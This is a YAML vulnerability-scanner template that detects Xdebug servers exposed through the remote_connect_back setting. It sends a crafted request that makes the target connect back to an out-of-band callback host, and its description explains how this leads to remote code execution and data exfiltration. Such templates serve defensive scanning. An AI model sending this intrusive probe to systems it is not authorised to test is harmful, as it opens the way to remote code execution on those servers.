php-xdebug-rce: Xdebug remote code execution via xdebug.remote_connect_back

id: php-xdebug-rce

info:
  name: Xdebug remote code execution via xdebug.remote_connect_back
  author: pwnhxl
  severity: high
  description: |
    The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with ‘xdebug.remote_connect_back’ enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
    - https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
    - https://paper.seebug.org/397/
    - https://github.com/D3Ext/XDEBUG-Exploit
  metadata:
    max-request: 1
  tags: oast,rce,vulhub,php,debug,xdebug,intrusive

http:
  - raw:
      - |
        GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - 'Set-Cookie: XDEBUG_SESSION={{randstr}}'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f04a01e1dd706067d32dd90ac376c5a6da4a966528517c77f8b142422ab831ca022100c6f77edf523f24759579ed5460000bd68cb33b13a30cd8d891bc7d42149af23a:922c64590222798bb761d5b6d8e72950